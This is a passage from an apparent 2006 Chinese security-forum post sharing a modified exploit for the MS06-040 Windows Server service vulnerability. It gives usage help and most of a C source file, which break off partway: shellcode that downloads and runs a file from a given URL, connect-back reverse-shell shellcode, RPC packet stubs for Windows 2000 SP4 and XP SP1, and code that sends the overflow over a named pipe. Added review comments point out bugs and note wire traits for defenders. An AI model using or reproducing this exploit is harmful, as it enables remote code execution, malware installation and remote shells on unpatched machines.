

      ms06040 download and reverse shellcode mika 修改版

       intruder 2006-09-11
      ms06040 download and reverse shellcode mika 修改版

      文章作者:mika[EST]
      信息來源:邪惡八進制信息安全團隊(
      www.

      首先感謝macro哥哥的代碼,沒有這個代碼俺也不敢去想修改什么exploit。以前經??碽f弄這個漏洞那個漏洞的,也學到了點東西。有代碼了,修改就方便了。程序的運行幫助如下:
      F:\work\exploits\Release>ms06040rpc
      >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                  rewritten by
      superlone@
      >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

      Usage: ms06040rpc <host> <download url> <os type>

            ms06040rpc <host> <reverse addr> <revser port> <os type>

      <download url>:
                such as:
      http://192.168.0.128/test.exe

      <reverse addr>:
                your host ip address

      <reverse port>:
                your host listenning port

      <os type(1/2)>:
                  1: win 2000sp4 2:win xpsp1

      ^_^Mika is telling you:don‘t play with fire!

      嘿嘿~~~一看就懂吧。

      我一開始修改的版本在獲得反向shell后,如果退出這個shell后就會造成對方機器出現關機對話框。
      不過還好,請BF給解決了。嘿嘿



      代碼在下面:
      CODE:

      #include <winsock2.h>
      #include <Rpc.h>
      #include <stdio.h>
      #include <stdlib.h>


      #pragma comment(lib, "mpr")
      #pragma comment(lib, "Rpcrt4")
      #pragma comment(lib, "ws2_32")




      // Decoder-stub parameters used by makecode(): the first DECODE_LEN bytes of
      // sc are left unencoded (the XOR decoder stub); makecode() patches the
      // payload length in at SC_LEN_OFFSET and the chosen XOR key at ENC_KEY_OFFSET.
      #define DECODE_LEN 23
      #define SC_LEN_OFFSET 8
      #define ENC_KEY_OFFSET 13
      #define ENC_KEY 0xFF  // initial value of the key in makecode(); replaced by the key it finds


      // Payload staging buffer. makecode() (download mode) and Attack()
      // (reverse-connect mode) fill it; Attack() then copies Sc_len bytes of it
      // into the request stub. NOTE(review): nothing checks the URL length against
      // this fixed 1024-byte size before makecode() appends the URL.
      unsigned char sc[1024] = "";
      // Number of valid bytes in sc; written by makecode() and by Attack(),
      // read by Attack() when copying into the request.
      unsigned int Sc_len;
      unsigned char shellcodenew[]={//download shellcode
      "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\xEE\xEE\x80\x34\x0B\xFF\xE2\xFA"
      "\xEB\x05\xE8\xEB\xFF\xFF\xFF\xE9\xF2\x00\x00\x00\x5F\x64\xA1\x30"
      "\x00\x00\x00\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x68\x08\x8B\xF7\x6A"
      "\x04\x59\xE8\x92\x00\x00\x00\xE2\xF9\x68\x6F\x6E\x00\x00\x68\x75"
      "\x72\x6C\x6D\x54\xFF\x16\x8B\xE8\xE8\x7C\x00\x00\x00\x83\xEC\x20"
      "\x8B\xDC\x6A\x20\x53\xFF\x56\x04\xC7\x04\x03\x5C\x61\x2E\x65\xC7"
      "\x44\x03\x04\x78\x65\x00\x00\x33\xC0\x50\x50\x53\x57\x50\xFF\x56"
      "\x10\x8B\xEC\x81\xED\xBB\x00\x00\x00\x89\x5D\xA0\x8B\x5E\x08\x89"
      "\x5D\xA4\x8B\xE5\x81\xEC\xDD\x00\x00\x00\x8D\x85\xA8\xFF\xFF\xFF"
      "\x6A\x44\x59\xC6\x00\x00\x40\xE2\xFA\xC7\x45\xA8\x44\x00\x00\x00"
      "\x8B\xF4\x8D\x45\xEC\x50\x8D\x4D\xA8\x51\x6A\x00\x6A\x00\x6A\x20"
      "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x8B\x55\xA0\x52\xFF\x55\xA4\x3B"
      "\xF4\xE8\xA4\x07\x00\x00\xFF\x56\x0C\x51\x56\x8B\x75\x3C\x8B\x74"
      "\x2E\x78\x03\xF5\x56\x8B\x76\x20\x03\xF5\x33\xC9\x49\x41\xAD\x03"
      "\xC5\x33\xDB\x0F\xBE\x10\x3A\xD6\x74\x08\xC1\xCB\x0D\x03\xDA\x40"
      "\xEB\xF1\x3B\x1F\x75\xE7\x5E\x8B\x5E\x24\x03\xDD\x66\x8B\x0C\x4B"
      "\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03\xC5\xAB\x5E\x59\xC3\xE8\x09"
      "\xFF\xFF\xFF\x8E\x4E\x0E\xEC\xC1\x79\xE5\xB8\x72\xFE\xB3\x16\xEF"
      "\xCE\xE0\x60\x36\x1A\x2F\x70"
      };
      unsigned char connectbacksc[]=
      "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
      "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
      "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
      "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
      "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
      "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
      "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
      "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
      "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
      "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
      "\xca\x6e\x84\x0b\x66\x68\x10\xe1\x66\x53\x89\xe1\x95\x68\xec\xf9"
      "\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
      "\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
      "\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
      "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
      "\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
      "\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
      "\xff\x77\xfc\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0";
      BYTE Data2000[] =//packets for win2000.arguments size:AllocHint,less than 5000
      {"\x75\x6b\x22"
      "\x56\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x1b"
      "\xf7\x15\x02\x00\x00\x00\x00\x00\x00\x15\x02\x00\x00\x4a\xf9\x42"
      "\xf5\x93\x4a\x93\x37\x93\xf5\x92\x9b\x93\x27\x4f\x47\x49\x37\xd6"
      "\xfc\xfd\x27\x4a\x90\x90\x40\x9f\x9f\x9b\x3f\xfd\xf9\x43\x4b\x92"
      "\x40\x43\x4e\x96\x49\x90\x93\x3f\x91\x98\x96\xf8\x4a\x99\x3f\x43"
      "\xf5\x40\x9f\x47\x9b\x98\x41\x9f\x4b\x3f\x40\x42\x4a\x92\x90\x4f"
      "\x92\x46\x96\x40\x41\xfd\x41\x3f\x96\x43\x4e\x49\x43\x4f\x91\xfc"
      "\x4f\x93\x3f\x27\x96\x91\x37\x97\x98\x98\x98\x4a\xf5\x91\x96\x93"
      "\x93\x47\x97\x49\x96\x97\xf5\xd6\x47\x91\x91\x90\x42\x48\x98\x42"
      "\x49\x3f\x93\x90\x93\x4e\x47\x47\x99\x92\x27\xfd\xfd\xfc\x4b\x91"
      "\x4b\x43\x4b\xd6\x46\x37\x92\xf5\x46\x4f\x99\x9f\xd6\x97\xf5\x9b"
      "\xf8\x43\xf8\x97\x4f\x3f\x41\x27\x96\x92\x27\x93\x4b\x98\x9b\x48"
      "\x47\xf8\x93\x48\xfc\x98\xf5\x91\x4f\x9f\x42\x4a\x48\x4a\x97\x4e"
      "\x91\x49\x90\xf8\x91\x4f\x92\x96\x92\xd6\x47\x98\x90\x40\xf5\xfc"
      "\x46\xf5\x46\xf9\xd6\x4f\xfc\x98\x91\x41\x91\x48\xfc\x98\x49\x49"
      "\xfc\x41\x37\x46\x46\xf5\x90\x3f\x48\x4a\x40\x37\x47"
      "\x41\xf5\x93"
      "\xf8\x40\x92\x49\x4a\x37\xfd\xf8\x93\x9b\x46\x47\x47\x92\x92\x92"
      "\x93\x99\x93\x93\xfd\x3f\x42\x47\x90\x96\x92\x4f\x4a\x4a\x93\x93"
      "\x46\x3f\xf9\xfd\x90\x9b\x97\x47\x9b\x91\x49\xd6\x97\x91\x4b\x40"
      "\x27\x46\x42\x91\x48\x97\x4e\x93\x90\x96\x49\xf5\xf9\x43\x4b\x41"
      "\xf5\x48\xfd\x4b\x41\x43\x40\x4b\xf9\x97\xfd\xfc\xf9\xfc\xf9\x96"
      "\x9f\x99\xd6\x41\x4a\xd6\x27\x4a\x99\x27\x48\xf5\xf9\x90\x37\x42"
      "\x91\x40\xfc\x4b\x41\x96\x90\x9f\xfc\x47\xf5\x27\xf5\x92\x47\x96"
      "\x4a\x4f\x92\x46\x98\x4b\x92\x3f\x41\xf8\x46\xd6\xfc\x27\x27\x49"
      "\x49\x9f\x27\x4f\x92\x46\xd6\x41\xf9\x37\x37\x97\xfc\x91\xf5\x46"
      "\x47\x48\xfd\x96\xf5\x90\x90\x4b\x9b\xfd\xf8\xf8\x4a\x27\x46\x91"
      "\x99\x93\x93\xd6\x97\xf9\x43\x9b\xfc\xd6\xfd\x41\xd6\xd6\x9f\x97"
      "\x4f\x49\x9b\xd6\x42\x37\x40\xf8\x9b\xfc\x90\xfd\x42\xd6\x41\x49"
      "\x97\x3f\x99\x93\xf8\x49\x27\x97\xd6\x92\x47\x93\x4e\x9f\x37\xd6"
      "\xfd\xd6\x4b\x42\x46\x91\x4a\x9f\x91\x49\x90\x4e\x49\x48\x98\x27"
      "\xd6\x46\x90\x43\x3f\xf9\xf8\x48\x3f\x40\x4b\x9f\x37\x9b\xd6\xfd"
      "\x40\xd6\x99\x47\x46\x97\x90\x49\x4e\xfd\x93\x3f\x3f"
      "\x4a\xd6\x40"
      "\x96\xd6\xf9\x27\xfd\x4f\x43\x90\xf8\x42\xd6\x92\x43\x96\x91\x4a"
      "\x46\x4f\xfd\x92\xfc\x40\x37\x97\xf5\xf5\x97\x92\x4b\x99\xf8\x37"
      "\xf5\x40\x98\x40\xfc\x42\xf9\x4b\x99\x43\x40\x97\x48\x4e\x49\x41"
      "\xf9\x90\x49\xfc\x47\xfd\x93\x48\x42\x4a\x40\xd6\x96\x37\x27\x43"
      "\x49\x92\x4f\x41\x93\xd6\x4e\x9f\x43\x98\x4e\xd6\x96\x3f\x9f\x4b"
      "\x4a\x99\x47\x37\xfc\xf9\xd6\x99\xf8\x27\x4b\x47\x90\xf9\x49\x4b"
      "\xd6\xfd\x99\x90\x4e\x98\xfd\x4b\x96\x43\x4f\x3f\x4a\x90\xf9\x42"
      "\x96\x40\x4e\x37\x99\x48\x40\x49\x27\x97\x92\xd6\x37\x93\x37\x46"
      "\xfd\x96\x42\x9b\xf8\x9b\x4b\x97\x40\x91\x4b\x93\xd6\x4f\x42\x9f"
      "\x4b\x4e\xf5\xfd\x91\x99\xfc\x99\x92\x27\x3f\xf9\x49\xfc\xf5\xf5"
      "\x37\x3f\xd6\x92\x4b\xf9\x3f\x97\x4b\x9b\x4f\x49\x47\x47\x3f\xfd"
      "\x98\xd6\x37\x4b\x4a\x91\x90\x27\x3f\x97\xf9\xd6\xd6\x90\x40\x40"
      "\x43\x43\x40\xf8\x90\x96\x92\x48\x96\x27\xf9\x99\x96\x96\x4f\x96"
      "\x4b\x4f\x98\xf9\x41\x93\x99\xd6\x9b\x97\x4e\x4e\xfd\x46\x37\x9f"
      "\x40\xfd\x97\x47\x9b\x41\x43\x42\x4e\x40\x4e\x3f\x37\x97\x9f\x37"
      "\xfd\x92\x98\x90\x91\xfd\x90\xf8\xfc\x93\x96\x91\x41"
      "\x4f\x9f\x46"
      "\x92\x27\x4f\x3f\x40\x37\x91\x4e\x4f\xf5\x99\x3f\x4a\x93\x99\x9f"
      "\xf5\x90\x46\x93\x43\x27\x27\x4f\x4e\x91\x42\x6a\x35\x59\xd9\xee"
      "\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd3\x45\x7d\xa2\x83\xeb\xfc\xe2"
      "\xf4\x52\x81\x82\x4d\x2c\xba\x39\x5e\x3b\x01\x7d\xa2\xd3\xce\x38"
      "\x9e\x58\x39\x78\xda\xd2\xaa\xf6\xed\xcb\xce\x22\x82\xd2\xae\x34"
      "\x29\xe7\xce\x7c\x4c\xe2\x85\xe4\x0e\x57\x85\x09\xa5\x12\x8f\x70"
      "\xa3\x11\xae\x89\x99\x87\x61\x79\xd7\x36\xce\x22\x86\xd2\xae\x1b"
      "\x29\xdf\x0e\xf6\xfd\xcf\x44\x96\x29\xcf\xce\x7c\x49\x5a\x19\x59"
      "\xa6\x10\x74\xbd\xc6\x58\x05\x4d\x27\x13\x3d\x71\x29\x93\x49\xf6"
      "\xd2\xcf\xe8\xf6\xca\xdb\xae\x74\x29\x53\xf5\x7d\xa2\xd3\xce\x15"
      "\x9e\x8c\x74\x8b\xc2\x85\xcc\x85\x21\x13\x3e\x2d\xca\x3c\x8b\x9d"
      "\xc2\xbb\xdd\x83\x28\xdd\x12\x82\x45\xb0\x28\x19\x8c\xb6\x3d\x18"
      "\x82\xfc\x26\x5d\xcc\xb6\x31\x5d\xd7\xa0\x20\x0f\x82\xe2\x77\x4e"
      "\x82\xe2\x77\x4e\x82\xfc\x04\x39\xe6\xf3\x63\x5b\x82\xbd\x20\x09"
      "\x82\xbf\x2a\x1e\xc3\xbf\x22\x0f\xcd\xa6\x35\x5d\xe3\xb7\x28\x14"
      "\xcc\xba\x36\x09\xd0\xb2\x31\x12\xd0\xa0\x65\x4c\x90"
      "\xe0\x65\x52\xe3\x97\x01\x7d\xa2"
      "\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00"
      "\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00"
      "\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00"
      "\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00\x04\x08\x02\x00"
      "\x00\x00\x93\xc8\xf5\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00"
      "\x02\x00\x00\x00\xeb\x02\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00"
      };
      BYTE Dataxp[] =//packets for win2000.arguments size:AllocHint,less than 5000
      {"\x0e\x4c\x9f\xe6\x01\x00\x00\x00"
      "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\xc8\x52\x63\x01\x00\x00"
      "\x00\x00\x00\x00\x63\x01\x00\x00\xfd\x4e\x4a\x48\x43\x4f\x47\x99"
      "\x93\xf8\x3f\x40\x98\x92\x9f\x91\x93\x43\xf5\x90\x4e\xd6\x92\x27"
      "\x91\x48\x99\xf5\x49\x43\x4e\x93\x49\x43\x90\x98\x4a\x98\x4e\x4f"
      "\x27\x46\xf9\x96\xd6\x90\x40\xfc\xfc\x93\x91\xf8\x4f\x27\x98\x42"
      "\x4f\x96\x48\x41\x90\x4a\x42\x9f\xfd\x98\x91\x91\x46\x41\x41\x92"
      "\x3f\xfc\x99\x93\x4e\x96\x40\x91\x98\x43\x96\x93\xf5\xd6\x4f\x9b"
      "\x27\x9f\x9b\xfd\x99\x3f\xfd\x4f\xd6\x91\x4a\x96\x98\xfd\xf9\x9b"
      "\x37\x41\xfc\x9f\x42\x4a\x40\xf8\x43\x4a\x98\x41\x91\x91\xf9\xd6"
      "\xd6\x9b\x49\x42\x3f\x90\xfc\x9b\x4b\x92\xfc\x37\x96\xfc\x41\x98"
      "\xfc\x4f\x4e\x91\x97\x4a\x92\x49\x92\x9f\x91\x41\x4a\x41\x98\x27"
      "\x98\xd6\x91\x48\xfc\xfc\xf5\x4b\x9f\x9f\xfc\xd6\xf8\x49\x6a\x35"
      "\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x60\xd2\x21\xae\x83"
      "\xeb\xfc\xe2\xf4\xe1\x16\xde\x41\x9f\x2d\x65\x52\x88\x96\x21\xae"
      "\x60\x59\x64\x92\xeb\xae\x24\xd6\x61\x3d\xaa\xe1\x78\x59\x7e\x8e"
      "\x61\x39\x68\x25\x54\x59\x20\x40\x51\x12\xb8\x02\xe4\x12\x55\xa9"
      "\xa1\x18\x2c\xaf\xa2\x39\xd5\x95\x34\xf6\x25\xdb\x85\x59\x7e\x8a"
      "\x61\x39\x47\x25\x6c\x99\xaa\xf1\x7c\xd3\xca\x25\x7c\x59\x20\x45"
      "\xe9\x8e\x05\xaa\xa3\xe3\xe1\xca\xeb\x92\x11\x2b\xa0\xaa\x2d\x25"
      "\x20\xde\xaa\xde\x7c\x7f\xaa\xc6\x68\x39\x28\x25\xe0\x62\x21\xae"
      "\x60\x59\x49\x92\x3f\xe3\xd7\xce\x36\x5b\xd9\x2d\xa0\xa9\x71\xc6"
      "\x8f\x1c\xc1\xce\x08\x4a\xdf\x24\x6e\x85\xde\x49\x03\xbf\x45\x80"
      "\x05\xaa\x44\x8e\x4f\xb1\x01\xc0\x05\xa6\x01\xdb\x13\xb7\x53\x8e"
      "\x51\xe0\x12\x8e\x51\xe0\x12\x8e\x4f\x93\x65\xea\x40\xf4\x07\x8e"
      "\x0e\xb7\x55\x8e\x0c\xbd\x42\xcf\x0c\xb5\x53\xc1\x15\xa2\x01\xef"
      "\x04\xbf\x48\xc0\x09\xa1\x55\xdc\x01\xa6\x4e\xdc\x13\xf2\x10\x9c"
      "\x53\xf2\x0e\xef\x24\x96\x21\xae\x31\x76\x57\x4e\x65\x59\x45\x4d"
      "\x69\x73\x49\x39\x76\x32\x39\x52\x74\x55\x5a\x57\x6c\x6e\x6b\x4b"
      "\x51\x64\x39\x4e\x55\x32\x73\x31\x71\x44\x6f\x55\x4d\x44\x6f\x70"
      "\x33\x58\x47\x70\x35\x34\x7a\x6e\x61\x4c\x6d\x4e\x39\x30\x50\x39"
      "\x47\x4d\x64\x50\x46\x63\x4b\x61\x74\x63\x62\x38\x44\x69\x76\x76"
      "\x39\x49\x61\x51\x41\x5a\x37\x36\x6e\x6a\x6f\x6d\x7a\x6e\x46\x43"
      "\x46\x79\x4e\x6e\x4c\x4d\x53\x48\x7a\x46\x77\x78\x47\x63\x52\x5a"
      "\x35\x30\x6f\x42\x33\x42\x57\x38\x56\x59\x7a\x47\x6b\x78\x62\x6b"
      "\x76\x68\x79\x63\x4b\x68\x42\x69\x46\x53\x54\x39\x4a\x6e\x38\x74"
      "\x75\x72\x78\x50\x69\x6d\x61\x57\x70\x62\x76\x36\x38\x74\x77\x69"
      "\x62\x6b\x4a\x59\x38\x52\x75\x63\x6c\x5a\x62\x77\x32\x51\x6f\x4b"
      "\x75\x4c\x6d\x32\x48\x6c\x50\x4f\x37\x53\x48\x74\x34\x65\x4f\x35"
      "\x58\x6e\x47\x53\x69\x56\x48\x62\x36\x52\x78\x35\x7a\x61\x4b\x37"
      "\x6f\x64\x49\x31\x4b\x6f\x38\x31\x35\x4c\x33\x61\x0a\x08\x02\x00"
      "\x77\x6d\x4f\x36\x48\x7a\x47\x79\x04\x08\x02\x00\x7a\x37\x38\x43"
      "\x47\x50\x59\x78\x34\x31\x79\x68\x55\x30\x4c\x6b\x61\x43\x6b\x70"
      "\x67\x68\x70\x49\x4d\x55\x74\x55\x73\x45\x74\x5a\x04\x08\x02\x00"
      "\x5a\x7a\x44\x68\x56\x75\x4e\x6c\x04\x08\x02\x00\x7a\x52\x66\x53"
      "\x66\x5a\x54\x49\x75\x56\x6a\x63\x75\x5a\x66\x55\x4c\x6d\x64\x4d"
      "\x45\x36\x42\x62\x74\x34\x36\x46\x54\x58\x66\x46\x00\x00\x43\x07"
      "\xc7\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
      "\x00\x00\x8d\xc1\x61\x00\x00\x00\x00\x00\x00\x00"
      };

      // DCE/RPC bind PDU as laid out on the wire (PacketType 0x0B). Only
      // InterfaceUUID, InterfaceVerMaj and InterfaceVerMin are ever written by
      // field name (in BindRpcInterface()); everything else is copied verbatim
      // from the PRPC template below, so the struct is effectively a 0x48-byte blob.
      // NOTE(review): no #pragma pack is visible. By my count the default padding
      // after NumCtxItems puts ContextID/NumTransItems at offsets that do not match
      // the wire format (which has three reserved bytes there), but those fields are
      // never written, and InterfaceUUID still lands at offset 32 with a total size
      // of 0x48 — worth confirming with a sizeof check on the build used.
      struct RPCBIND
      {
      BYTE VerMaj;          // RPC major version (5 in PRPC)
      BYTE VerMin;          // RPC minor version (0 in PRPC)
      BYTE PacketType;      // 0x0B = bind
      BYTE PacketFlags;
      DWORD DataRep;        // data representation; 0x10 = little-endian integers
      WORD FragLength;      // whole PDU length, 0x48 for this bind
      WORD AuthLength;
      DWORD CallID;
      WORD MaxXmitFrag;
      WORD MaxRecvFrag;
      DWORD AssocGroup;
      BYTE NumCtxItems;     // one presentation context in PRPC
      WORD ContextID;
      WORD NumTransItems;
      GUID InterfaceUUID;   // overwritten by BindRpcInterface()
      WORD InterfaceVerMaj; // overwritten by BindRpcInterface()
      WORD InterfaceVerMin; // overwritten by BindRpcInterface()
      GUID TransferSyntax;
      DWORD SyntaxVer;
      };
      // Template bind request (0x48 bytes). Bytes 32..47 hold a placeholder
      // interface UUID that BindRpcInterface() replaces; bytes 52..67 are the NDR
      // transfer syntax (8a885d04-1ceb-11c9-9fe8-08002b104860) and 68..71 its
      // version (2). Max xmit/recv fragment size is 0x10B8.
      BYTE PRPC[0x48] ={0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
      0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
      0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
      0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
      0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};//bind template; interface UUID/version patched per call

      // DCE/RPC request PDU header (PacketType 0x00). Under default alignment this
      // is 24 bytes with no padding, which is what the hard-coded "24" used for
      // the header length in Attack() relies on.
      struct RPCFUNC
      {
      BYTE VerMaj;
      BYTE VerMin;
      BYTE PacketType;   // 0x00 = request
      BYTE PacketFlags;  // 0x03 = first and last fragment
      DWORD DataRep;
      WORD FragLength;   // header + stub length; rewritten per OS in Attack()
      WORD AuthLength;
      DWORD CallID;
      DWORD AllocHint;   // stub length; rewritten per OS in Attack()
      WORD ContextID;
      WORD Opnum;        // operation number; Attack() sets it to 31
      };
      // Template request header that Attack() copies into RPCOP (the literal has a
      // trailing NUL, only the first 24 bytes are used): FragLength 0x0480,
      // CallID 1, AllocHint 0x0468, ContextID 0, Opnum 0x1f. FragLength, AllocHint
      // and Opnum are overwritten in Attack() before sending.
      BYTE POP[] =//stub header RPCFUNC structure
      {
      "\x05\x00\x00\x03\x10\x00\x00\x00\x80\x04\x00\x00\x01\x00\x00\x00"
      "\x68\x04\x00\x00\x00\x00\x1f\x00"
      };


      void makecode(char *url);

      // Sends a DCE/RPC bind for the interface given as a UUID string plus a
      // "major.minor" version string over an already-open named-pipe handle,
      // using PRPC as the template for everything but the UUID and version.
      // NOTE(review): nothing is checked here — the UuidFromString() status, the
      // TransactNamedPipe() result and the bind_ack/bind_nak that lands in rbuf
      // are all ignored, and the function always returns 0, so a rejected bind goes
      // unnoticed and main() proceeds to Attack() regardless. The string that
      // UuidToString() allocates is stored into the local Interface pointer, never
      // used again and never released with RpcStringFree() (a leak, harmless in a
      // one-shot tool). atoi(&InterfaceVer[2]) assumes a single-digit major version
      // such as "3.0".
      int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer) {
      BYTE rbuf[0x1000]="";
      DWORD dw=0;
      struct RPCBIND RPCBind;
      memcpy(&RPCBind,&PRPC,sizeof(RPCBind));  // whole 0x48-byte bind template
      UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);
      UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);  // round-trip only; result unused
      RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
      RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
      TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);  // reply not examined
      return 0;
      }

      // Builds and sends the request: a 24-byte RPCFUNC header (from POP, with
      // Opnum 31 — srvsvc NetprPathCanonicalize, the MS06-040 entry point)
      // followed by the per-OS stub (Data2000 for i==1, Dataxp for i==2), with the
      // payload staged in sc copied over the stub starting at stub offset 32.
      // paramstr: download URL when type==0 (encoded by makecode()), otherwise the
      // reverse-connect address, with port the listener port. A one-character
      // paramstr skips payload preparation entirely (empty branch below).
      // Always returns 0; nothing read back from the pipe is examined.
      // For defenders: on the wire this is a DCE/RPC request PDU with opnum 31 and a
      // 1128- or 772-byte stub, written to the named pipe that main() opened.
      // NOTE(review), local robustness only: WSAStartup() has no matching
      // WSACleanup(); malloc() is unchecked; Sc_len is never bounded against the
      // 1128-32 / 772-32 bytes that remain after the stub offset, so an
      // over-long URL overruns LargeBuffer; TransactNamedPipe() results and rbuf
      // are ignored; bwritten is unused.
      int Attack(HANDLE PipeHandle,char *paramstr,int i,unsigned short port,int type)
      {
      struct RPCFUNC RPCOP;
      int bwritten=0;
      BYTE *LargeBuffer=NULL;
      BYTE rbuf[0x100]="";
      unsigned long ip=0;
      DWORD dw;
      WSADATA wsa;

      WSAStartup(MAKEWORD(2,2),&wsa);  // only inet_addr()/htons() below need Winsock
      if(strlen(paramstr)==1)
      {
      // Single-character parameter: sc/Sc_len are deliberately left untouched.
      // For i==1 the sc copy below is skipped as well; for i==2 it is not, so
      // whatever sc/Sc_len currently hold (zero-initialised globals unless
      // makecode() ran earlier in this process) is copied into the stub.
      }
      else if(type==0)
      {
      makecode(paramstr);  // download mode: stub + download shellcode + URL, XOR-encoded
      }
      else
      {
         // Reverse-connect mode: the listener address and port are written into
         // the connect-back payload at fixed offsets, then staged in sc.
         ip=inet_addr(paramstr);
         port=htons(port);
         memcpy(connectbacksc+160,&ip,4);
         memcpy(connectbacksc+166,&port,2);
         memcpy(sc,connectbacksc,sizeof(connectbacksc));
         Sc_len=sizeof(connectbacksc);
      }
      memcpy(&RPCOP,&POP,sizeof(RPCOP));  // 24-byte request header template
      RPCOP.Opnum = 31;
      printf("^_^Mika is telling you:don‘t play with fire!^o^\n\n");
      if(i==1)//win 2000
      {
      RPCOP.FragLength=sizeof(RPCOP)+1128;//1128: size of Data2000; FragLength = size of POP + size of Data2000
      RPCOP.AllocHint=1128;
      LargeBuffer=(BYTE *)malloc(24+1128);  // NOTE(review): unchecked
      memset(LargeBuffer,0x00,24+1128);
      memcpy(LargeBuffer,&RPCOP,24);
      memcpy(LargeBuffer+24,&Data2000,1128);
      if(strlen(paramstr)!=1)
      {
      memcpy(LargeBuffer+24+32, sc, Sc_len);  // payload overwrites the stub from offset 32; Sc_len unbounded
      }
      printf("Sending payload...\n");
      TransactNamedPipe(PipeHandle, LargeBuffer,
      24+1128, rbuf, sizeof(rbuf), &dw, NULL);
      }
      if(i==2)//win xp
      {
      RPCOP.FragLength=sizeof(RPCOP)+772;//772: size of Dataxp; FragLength = size of POP + size of Dataxp
      RPCOP.AllocHint=772;
      LargeBuffer=(BYTE *)malloc(24+772);  // NOTE(review): unchecked
      memset(LargeBuffer,0x00,24+772);
      memcpy(LargeBuffer,&RPCOP,24);
      memcpy(LargeBuffer+24,&Dataxp,772);
      printf("Sending payload1...finish\n");
      memcpy(LargeBuffer+24+32, sc, Sc_len);  // copied unconditionally here, unlike the i==1 branch

      TransactNamedPipe(PipeHandle, LargeBuffer,
      24+772, rbuf, sizeof(rbuf), &dw, NULL);
      printf("Sending payload2...finish\n");
      // The identical request is rebuilt and sent a second time (the "payload2"
      // message prints before that second send actually happens).
      memset(LargeBuffer,0x00,24+772);
      memcpy(LargeBuffer,&RPCOP,24);
      memcpy(LargeBuffer+24,&Dataxp,772);
      memcpy(LargeBuffer+24+32, sc, Sc_len);
      TransactNamedPipe(PipeHandle, LargeBuffer,
      24+772, rbuf, sizeof(rbuf), &dw, NULL);



      }

      free(LargeBuffer);  // still NULL (no-op) when i is neither 1 nor 2 — nothing is sent then
      return 0;
      }
      // Download-mode payload builder. Stages shellcodenew in sc with url appended
      // over the literal's terminating NUL, then searches for a single-byte XOR key
      // from 0xFF down to 0x01 (0x00 is never tried) under which no byte of
      // sc[DECODE_LEN..Sc_len) maps to one of the bytes listed below. On success
      // the bytes from DECODE_LEN on are XOR-ed with that key and the length and
      // key are patched into the unencoded stub at SC_LEN_OFFSET / ENC_KEY_OFFSET;
      // on failure the process exits. Sets the globals sc and Sc_len; Sc_len covers
      // the URL plus the trailing zero bytes left by ZeroMemory().
      // NOTE(review): strlen(url) is never checked against sizeof sc, so a URL
